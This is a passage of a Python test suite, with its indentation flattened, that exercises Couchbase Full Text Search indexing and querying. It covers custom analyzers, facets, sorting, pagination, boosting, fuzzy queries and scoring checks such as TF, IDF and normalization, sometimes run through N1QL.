self.log.info("Editing custom index with new map...")
index.generate_new_custom_map(seed=index.cm_id+10)
index.index_definition['uuid'] = index.get_uuid()
index.update()
# updating mapping on ES is not easy, often leading to merge issues
# drop and recreate the index, load again
self.create_es_index_mapping(index.es_custom_map)
self.load_data()
self.wait_for_indexing_complete()
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(index, n1ql_executor=n1ql_executor)
if fail:
raise err
def index_query_in_parallel(self):
"""
Run rqg before querying is complete
turn off es validation
goal is to make sure there are no fdb or cbft crashes
"""
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="default_index")
self.load_data()
self.generate_random_queries(index, self.num_queries, self.query_types)
self.run_query_and_compare(index)
def load_index_query_all_in_parallel(self):
"""
Run rqg before querying is complete
turn off es validation
goal is to make sure there are no fdb or cbft crashes
"""
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="default_index")
self.sleep(20)
self.generate_random_queries(index, self.num_queries, self.query_types)
from threading import Thread
threads = []
threads.append(Thread(target=self.load_data,
name="loader thread",
args=()))
threads.append(Thread(target=self.run_query_and_compare,
name="query thread",
args=(index,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def index_edit_and_query_custom_analyzer(self):
"""
Index and query index, update map, query again, uses RQG
"""
fail = False
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
self.create_es_index_mapping(index.es_custom_map, index.index_definition)
self.load_data()
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
try:
self.run_query_and_compare(index)
except AssertionError as err:
self.log.error(err)
fail = True
self.log.info("Editing custom index with new custom analyzer...")
index.update_custom_analyzer(seed=index.cm_id + 10)
index.index_definition['uuid'] = index.get_uuid()
index.update()
# updating mapping on ES is not easy, often leading to merge issues
# drop and recreate the index, load again
self.create_es_index_mapping(index.es_custom_map,index.index_definition)
self.wait_for_indexing_complete()
try:
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(index, n1ql_executor=n1ql_executor)
except AssertionError as err:
self.log.error(err)
fail = True
if fail:
raise err
def index_delete_custom_analyzer(self):
"""
Create Index and then update by deleting custom analyzer in use, or custom filter in use.
"""
error_msg = TestInputSingleton.input.param('error_msg', '')
fail = False
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
self.load_data()
self.wait_for_indexing_complete()
self.log.info("Editing custom index by deleting custom analyzer/filter in use...")
index.update_custom_analyzer(seed=index.cm_id + 10)
index.index_definition['uuid'] = index.get_uuid()
try:
index.update()
except Exception as err:
self.log.error(err)
if err.message.count(error_msg,0,len(err.message)):
self.log.info("Error is expected")
else:
self.log.info("Error is not expected")
raise err
def test_field_name_alias(self):
"""
Test the Searchable As property in field mapping
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping(field_name=self.field_name,
field_type=self.field_type,
field_alias=self.field_alias)
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, matches, time_taken, status = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
def test_one_field_multiple_analyzer(self):
"""
1. Create an default FTS index on wiki dataset
2. Update it to add a field mapping for revision.text.#text field with 'en' analyzer
3. Should get 0 search results for a query
4. Update it to add another field mapping for the same field, with 'fr' analyzer
5. Same query should yield more results now.
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping(field_name=self.field_name,
field_type=self.field_type,
field_alias=self.field_alias,
analyzer="en")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits1", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits)
self.log.info("Hits: %s" % hits)
index.add_analyzer_to_existing_field_map(field_name=self.field_name,
field_type=self.field_type,
field_alias=self.field_alias,
analyzer="fr")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits2", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits)
self.log.info("Hits: %s" % hits)
def test_facets(self):
field_indexed = self._input.param("field_indexed",True)
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping(field_name="type",
field_type="text",
field_alias="type",
analyzer="keyword")
if field_indexed:
index.add_child_field_to_default_mapping(field_name="dept",
field_type="text",
field_alias="dept",
analyzer="keyword")
index.add_child_field_to_default_mapping(field_name="salary",
field_type="number",
field_alias="salary")
index.add_child_field_to_default_mapping(field_name="join_date",
field_type="datetime",
field_alias="join_date")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
try:
for index in self._cb_cluster.get_indexes():
hits, _, _, _, facets = index.execute_query_with_facets(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits)
self.log.info("Hits: %s" % hits)
self.log.info("Facets: %s" % facets)
index.validate_facets_in_search_results(no_of_hits=hits,
facets_returned=facets)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: "+ err.message)
def test_facets_during_index(self):
field_indexed = self._input.param("field_indexed",True)
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.sleep(5)
index.add_child_field_to_default_mapping(field_name="type",
field_type="text",
field_alias="type",
analyzer="keyword")
if field_indexed:
index.add_child_field_to_default_mapping(field_name="dept",
field_type="text",
field_alias="dept",
analyzer="keyword")
index.add_child_field_to_default_mapping(field_name="salary",
field_type="number",
field_alias="salary")
index.add_child_field_to_default_mapping(field_name="join_date",
field_type="datetime",
field_alias="join_date")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
while not self.is_index_complete(index.name):
zero_results_ok = True
try:
hits, _, _, _, facets = index.execute_query_with_facets(query,
zero_results_ok=zero_results_ok)
self.log.info("Hits: %s" % hits)
self.log.info("Facets: %s" % facets)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: "+ err.message)
def test_doc_config(self):
# delete default bucket
self._cb_cluster.delete_bucket("default")
master = self._cb_cluster.get_master_node()
# Load Travel Sample bucket and create an index
self.load_sample_buckets(server=master, bucketName="travel-sample")
bucket = self._cb_cluster.get_bucket_by_name("travel-sample")
index = self.create_index(bucket, "travel-index")
self.sleep(10)
self.wait_for_indexing_complete()
# Add Type Mapping
index.add_type_mapping_to_index_definition(type="airport",
analyzer="en")
index.add_type_mapping_to_index_definition(type="hotel",
analyzer="en")
mode = self._input.param("mode", "type_field")
index.add_doc_config_to_index_definition(mode=mode)
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(15)
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True,
zero_rows_ok=False)
# Run Query
expected_hits = int(self._input.param("expected_hits", 0))
if not expected_hits:
zero_results_ok = True
else:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
try:
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
def test_boost_query_type(self):
# Create bucket, create index
self.load_data()
self.wait_till_items_in_bucket_equal(items=self._num_items/2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_type_mapping_to_index_definition(type="emp",
analyzer="keyword")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(15)
self.wait_for_indexing_complete()
zero_results_ok = False
expected_hits = 5
# Run Query w/o Boosting and compare the scores for Docs emp10000086 &
# emp10000021. Should be the same
query = {"query": "dept:Marketing name:Safiya"}
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
try:
for index in self._cb_cluster.get_indexes():
hits, contents, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Contents: %s" % contents)
score_before_boosting_doc1 = index.get_score_from_query_result_content(
contents=contents, doc_id=u'emp10000021')
score_before_boosting_doc2 = index.get_score_from_query_result_content(
contents=contents, doc_id=u'emp10000086')
self.log.info("Scores before boosting:")
self.log.info("")
self.log.info("emp10000021: %s", score_before_boosting_doc1)
self.log.info("emp10000086: %s", score_before_boosting_doc2)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
if not score_before_boosting_doc1 == score_before_boosting_doc2:
self.fail("Testcase failed: Scores for emp10000021 & emp10000086 "
"are not equal before boosting")
        # Run Query with Boosting and compare the scores for Docs emp10000021 &
        # emp10000086. emp10000021's score should have improved w.r.t. emp10000086
query = {"query": "dept:Marketing^5 name:Safiya"}
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, contents, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Contents: %s" % contents)
score_after_boosting_doc1 = index.get_score_from_query_result_content(
contents=contents, doc_id=u'emp10000021')
score_after_boosting_doc2 = index.get_score_from_query_result_content(
contents=contents, doc_id=u'emp10000086')
self.log.info("Scores after boosting:")
self.log.info("")
self.log.info("emp10000021: %s", score_after_boosting_doc1)
self.log.info("emp10000086: %s", score_after_boosting_doc2)
assert score_after_boosting_doc1 == score_after_boosting_doc2
assert score_before_boosting_doc1 < score_after_boosting_doc1
assert score_before_boosting_doc2 < score_after_boosting_doc2
def test_doc_id_query_type(self):
# Create bucket, create index
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_type_mapping_to_index_definition(type="emp",
analyzer="keyword")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(15)
self.wait_for_indexing_complete()
expected_hits = int(self._input.param("expected_hits", 0))
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
# From the Query string, fetch the Doc IDs
doc_ids = copy.deepcopy(query['ids'])
# If invalid_doc_id param is passed, add this to the query['ids']
invalid_doc_id = self._input.param("invalid_doc_id",0)
if invalid_doc_id:
query['ids'].append(invalid_doc_id)
# If disjuncts_query is passed, join query and disjuncts_query
# to form a new query string
disjuncts_query = self._input.param("disjuncts_query", None)
if disjuncts_query:
if isinstance(disjuncts_query, str):
disjuncts_query = json.loads(disjuncts_query)
new_query = {}
new_query['disjuncts'] = []
new_query['disjuncts'].append(disjuncts_query)
new_query['disjuncts'].append(query)
query = new_query
# Execute Query
zero_results_ok = False
try:
for index in self._cb_cluster.get_indexes():
n1ql_query = "select d, meta().id from default d where search(d, "+json.dumps(query)+") and type='emp'"
hits, contents, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Contents: %s" % contents)
# For each doc id passed in the query, validate the
# presence in the search results
for doc_id in doc_ids:
self.assertTrue(index.is_doc_present_in_query_result_content
(contents=contents, doc_id=doc_id),"Doc ID "
"%s is not present in Search results"
% doc_id)
if self.run_via_n1ql:
n1ql_results = self._cb_cluster.run_n1ql_query(query=n1ql_query)
self.assertTrue(index.is_doc_present_in_query_result_content
(contents=n1ql_results['results'], doc_id=doc_id),"Doc ID "
"%s is not present in N1QL Search results"
% doc_id)
score = index.get_score_from_query_result_content\
(contents=contents, doc_id=doc_id)
self.log.info ("Score for Doc ID {0} is {1}".
format(doc_id,score))
if invalid_doc_id:
# Validate if invalid doc id was passed, it should
# not be present in the search results
self.assertFalse(index.is_doc_present_in_query_result_content
(contents=contents, doc_id=invalid_doc_id),
"Doc ID %s is present in Search results"
% invalid_doc_id)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
def test_sorting_of_results(self):
self.load_data()
self.wait_till_items_in_bucket_equal(self._num_items/2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"disjuncts": [{"match": "Safiya", "field": "name"},
{"match": "Palmer", "field": "name"}]}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
sort_params = self.build_sort_params()
hits, raw_hits, _, _ = index.execute_query(query = query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
sort_fields=sort_params,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Doc IDs: %s" % raw_hits)
if hits:
result = index.validate_sorted_results(raw_hits,
self.sort_fields_list)
if not result:
self.fail(
"Testcase failed. Actual results do not match expected.")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
def test_sorting_of_results_during_indexing(self):
self.load_data()
self.wait_till_items_in_bucket_equal(self._num_items/2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
#self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
#expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"disjuncts": [{"match": "Safiya", "field": "name"},
{"match": "Palmer", "field": "name"}]}
query = eval(self._input.param("query", str(default_query)))
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
while not self.is_index_complete(index.name):
sort_params = self.build_sort_params()
hits, raw_hits, _, _ = index.execute_query(query = query,
zero_results_ok=zero_results_ok,
sort_fields=sort_params,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Doc IDs: %s" % raw_hits)
#self.sleep(5)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
def test_sorting_of_results_on_non_indexed_fields(self):
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping(field_name="name",
field_type="text",
field_alias="name",
analyzer="en")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"disjuncts": [{"match": "Safiya", "field": "name"},
{"match": "Palmer", "field": "name"}]}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
sort_fields=self.sort_fields_list,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Doc IDs: %s" % raw_hits)
if hits:
result = index.validate_sorted_results(raw_hits,
self.sort_fields_list)
if not result:
self.fail(
"Testcase failed. Actual results do not match expected.")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
def test_scoring_tf_score(self):
"""
Test if the TF score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"cat - a lazy cat and a brown cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat and a brown cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
tf_score1, _, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='1',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info("TF for Doc ID 1 = %s" % tf_score1)
tf_score2, _, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='2',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info("TF for Doc ID 2 = %s" % tf_score2)
tf_score3, _, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='3',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info("TF for Doc ID 3 = %s" % tf_score3)
self.assertTrue(tf_score1 > tf_score2 > tf_score3,
"Testcase failed. TF score for Doc1 not > Doc2 not > Doc3")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def compare_n1ql_fts_scoring(self, n1ql_query='', raw_hits=[]):
n1ql_results = self._cb_cluster.run_n1ql_query(query=n1ql_query)
self.assertEquals(len(n1ql_results['results']), len(raw_hits),
"Return values are not the same for n1ql query and fts request.")
for res in n1ql_results['results']:
for hit in raw_hits:
if res['id'] == hit['id']:
self.assertEqual(res['score'], hit['score'],
"Scoring is not the same for n1ql result and fts request hit")
def test_scoring_idf_score(self):
"""
Test if the IDF score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"a brown cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat and a brown cat\\\"}",
"{\\\"text\\\":\\\"a brown dog\\\"}",
"{\\\"text\\\":\\\"a lazy dog\\\"}",
"{\\\"text\\\":\\\"a lazy dog and a brown dog\\\"}",
"{\\\"text\\\":\\\"a lazy fox and a brown fox\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
_, _, idf1, _, _ = index.get_detailed_scores_for_doc(doc_id='2',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info("IDF score for Doc ID 1 = %s" % idf1)
_, _, idf2, _, _ = index.get_detailed_scores_for_doc(doc_id='2',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='lazy')
self.log.info( "IDF score for Doc ID 2 = %s" % idf2)
self.assertTrue(idf1 > idf2, "Testcase failed. IDF score for Doc1 "
"for search term 'cat' not > that of search term 'lazy'")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def test_scoring_field_norm_score(self):
"""
Test if the Field Normalization score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"a cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat and a brown cat\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
_, field_norm1, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='1',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info(
"Field Normalization score for Doc ID 1 = %s" % field_norm1)
_, field_norm2, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='2',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info(
"Field Normalization score for Doc ID 2 = %s" % field_norm2)
_, field_norm3, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='3',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info(
"Field Normalization score for Doc ID 3 = %s" % field_norm3)
self.assertTrue(field_norm1 > field_norm2 > field_norm3,
"Testcase failed. Field Normalization score for "
"Doc1 not > Doc2 not > Doc3")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def test_scoring_query_norm_score(self):
"""
Test if the Query Normalization score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"a cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat and a brown cat\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
_, _, _, query_norm1, _ = index.get_detailed_scores_for_doc(
doc_id='1',
search_results=raw_hits,
weight='queryWeight',
searchTerm='cat')
self.log.info(
"Query Normalization score for Doc ID 1 = %s" % query_norm1)
_, _, _, query_norm2, _ = index.get_detailed_scores_for_doc(
doc_id='2',
search_results=raw_hits,
weight='queryWeight',
searchTerm='cat')
self.log.info(
"Query Normalization score for Doc ID 2 = %s" % query_norm2)
_, _, _, query_norm3, _ = index.get_detailed_scores_for_doc(
doc_id='3',
search_results=raw_hits,
weight='queryWeight',
searchTerm='cat')
self.log.info(
"Query Normalization score for Doc ID 3 = %s" % query_norm3)
self.assertTrue(query_norm1 == query_norm2 == query_norm3,
"Testcase failed. Query Normalization score for "
"Doc1 != Doc2 != Doc3")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def test_scoring_coord_score(self):
"""
Test if the Coord score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"a cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
_, _, _, _, coord1 = index.get_detailed_scores_for_doc(
doc_id='1',
search_results=raw_hits,
weight='coord',
searchTerm='')
self.log.info(
"Coord score for Doc ID 1 = %s" % coord1)
_, _, _, _, coord2 = index.get_detailed_scores_for_doc(
doc_id='2',
search_results=raw_hits,
weight='coord',
searchTerm='')
self.log.info(
"Coord score for Doc ID 2 = %s" % coord2)
self.assertTrue(coord1 < coord2,
"Testcase failed. Coord score for Doc1 not < Doc2")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def test_fuzzy_query(self):
"""
Test if fuzzy queries work fine
"""
test_data = [{"text":"simmer"},
{"text":"dimmer"},
{"text":"hammer"},
{"text":"shimmer"},
{"text":"rubber"},
{"text":"jabber"},
{"text":"kilmer"},
{"text":"year"},
{"text":"mumma"},
{"text":"tool stemmer"},
{"text":"he is weak at grammar"},
{"text":"sum of all the rows"}]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
index = self.create_index(bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, content, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True)
self.log.info("Docs in Search results = %s" % content)
self.log.info("Expected Docs = %s" % self.expected_docs)
if hits>0:
all_expected_docs_present = True
for doc in self.expected_docs_list:
all_expected_docs_present &= index.is_doc_present_in_query_result_content(content, doc)
self.assertTrue(all_expected_docs_present, "All expected docs not in search results")
def test_pagination_of_search_results(self):
max_matches = self._input.param("query_max_matches",10000000)
show_results_from_item = self._input.param("show_results_from_item",0)
self.load_data()
self.wait_till_items_in_bucket_equal(items = self._num_items/2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"match_all": "true", "field":"name"}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
sort_params = self.build_sort_params()
for index in self._cb_cluster.get_indexes():
hits, doc_ids, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
sort_fields=sort_params,
show_results_from_item=show_results_from_item)
self.log.info("Hits: %s" % hits)
self.log.info("Doc IDs: %s" % doc_ids)
if hits:
self.log.info("Count of docs on page = %s" % len(doc_ids))
if (show_results_from_item >= 0 and show_results_from_item <=self._num_items):
items_on_page = self._num_items - show_results_from_item
elif show_results_from_item < 0:
items_on_page = self._num_items
show_results_from_item = 0
else:
items_on_page = 0
expected_items_on_page = min(items_on_page,max_matches)
self.assertEqual(len(doc_ids),expected_items_on_page,"Items per page are not correct")
doc_id_prefix='emp'
first_doc_id = 10000001
i = 0
expected_doc_present = True
while i < expected_items_on_page:
expected_doc_id = doc_id_prefix+str(first_doc_id+i+show_results_from_item)
expected_doc_present &= (expected_doc_id in doc_ids)
if not expected_doc_present:
self.log.info("Doc ID %s not in the search results page" % expected_doc_id)
i += 1
self.assertTrue(expected_doc_present, "Some docs not present in the results page")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
def test_snippets_highlighting_of_search_term_in_results(self):
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping("name", "text")
index.add_child_field_to_default_mapping("manages.reports", "text")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(10)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"match": "Safiya", "field": "name"}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
n1ql_results = None
if self.run_via_n1ql:
